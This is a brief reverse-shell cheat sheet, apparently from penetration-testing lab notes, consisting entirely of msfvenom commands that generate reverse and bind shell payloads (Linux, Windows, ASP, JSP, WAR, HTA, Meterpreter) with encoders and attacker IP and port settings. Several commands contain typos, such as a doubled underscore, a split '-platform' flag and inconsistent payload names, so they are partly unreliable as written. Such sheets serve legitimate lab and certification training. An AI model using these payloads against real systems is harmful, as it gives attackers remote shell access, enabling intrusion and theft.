06 Reverse Shell Cheat Sheet

The syntax of generating reverse TCP shell payload

Using msfvenom

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.235 LPORT=1234 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le>shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.235 LPORT=4444 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le > shell2
msfvenom -p windows/shell_reverse__tcp -f asp LHOST=10.11.0.235 LPORT=443 -o labs/229/shell.asp
msfvenom -p windows/shell_bind_tcp -f exe >labs/31/shell.exe
msfvenom -p java/jsp_reverse_shell_tcp LHOST={my_IP} LPORT={my_PORT} -f raw > /var/www/html/shell.jsp
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.179 LPORT=1234 -f asp -a x86 - platform win -o shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war > shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.179 LPORT=1234 -f hta-psh -o exploit.hta
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp

Last updated